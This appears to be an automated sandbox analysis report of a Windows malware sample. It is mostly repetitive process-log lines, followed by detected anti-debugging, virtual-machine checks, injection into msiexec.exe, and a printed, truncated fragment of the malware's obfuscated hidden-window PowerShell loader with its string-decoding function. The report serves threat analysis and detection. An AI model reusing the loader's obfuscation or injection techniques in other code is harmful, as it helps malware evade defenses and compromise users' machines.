                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5329Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4579Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7959Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1728Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 8.8 %
                Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 8.3 %
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3496Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7048Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep count: 231 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 3756Thread sleep time: -115500s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 6848Thread sleep count: 1334 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 6848Thread sleep time: -4002000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 6848Thread sleep count: 8097 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 6848Thread sleep time: -24291000s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_21F510F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,9_2_21F510F1
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0040AE51 FindFirstFileW,FindNextFileW,13_2_0040AE51
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407EF8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,16_2_00407898
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00418981 memset,GetSystemInfo,13_2_00418981
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: msiexec.exe, 00000009.00000002.3042211181.000000000628E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
                Source: msiexec.exe, 00000009.00000002.3042211181.0000000006273000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\VMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&0001d0-94f2-00a0c91efb8b}\
                Source: msiexec.exe, 00000009.00000002.3042211181.00000000062C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: bhv68C0.tmp.13.drBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
                Source: powershell.exe, 00000002.00000002.1980472638.00000267C83A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: bhv68C0.tmp.13.drBinary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US
                Source: C:\Windows\SysWOW64\msiexec.exeAPI call chain: ExitProcess graph end nodegraph_15-33699
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_21F511EA GetFileAttributesW,LdrInitializeThunk,LdrInitializeThunk,9_2_21F511EA
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_21F560E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_21F560E2
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,13_2_004044A4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_21F54AB4 mov eax, dword ptr fs:[00000030h]9_2_21F54AB4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_21F5724E GetProcessHeap,9_2_21F5724E
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_21F560E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_21F560E2
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_21F52B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_21F52B1C
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_21F52639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_21F52639

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
                Source: Yara matchFile source: amsi64_6112.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6112, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3980, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3860000Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Derindad Telefonkdes Kroforvalterens knudshoveds #>;$Overimpressed215='Steroider115';<#Meso Allittereredes Sidelngder Petroleumsovn Markedsfringsomkostning #>;$Omittancesforstrke116=$Beseemingness+$host.UI;function Foreslaa($Tvivlstilfldet){If ($Omittancesforstrke116) {$Photoelectronics++;}$Transformationsprocesser=$Selskabsrevisors+$Tvivlstilfldet.'Length'-$Photoelectronics; for( $Omittance=4;$Omittance -lt $Transformationsprocesser;$Omittance+=5){$Benzanthrone++;$Vandsskader+=$Tvivlstilfldet[$Omittance];$Styreformerne15='Uproblematiske';}$Vandsskader;}function Heraclitean($Shagrag){ & ($Liljekonvals) ($Shagrag);}$Noden=Foreslaa 'CuprMTorpoStigzSc tiUninlS orlCarbaSkul/Lige ';$Noden+=Foreslaa 'Intr5 od.Slip0Poli Omf( Ed WBairiPreinRummd In oRandwHumosKjru FemaN recT Sta Ste1 Cab0Jux .Ixo 0 For;Sind TalaWGorbiVaesnHem 6.tvk4Afst; v.d SattxSt.b6Kabo4p.lk; Pet Visur etev Udh:Khed1Agit3Brig1Else. Lai0Edul)Deli spirGSlage rocLandkDemooW ys/ .ri2Di k0 .en1,ijo0Rest0Auto1Enla0Id.o1S am BosFAfskiMarkrP omeF ihf teo,entxRobo/U es1Sand3Trav1 Cou.Indl0a em ';$Deglutitive=Foreslaa 'MotiuSne,SHjesE An.RBou - RedaOto G K tE chenN nsTOxgo ';$Spisekortet=Foreslaa 'Glach 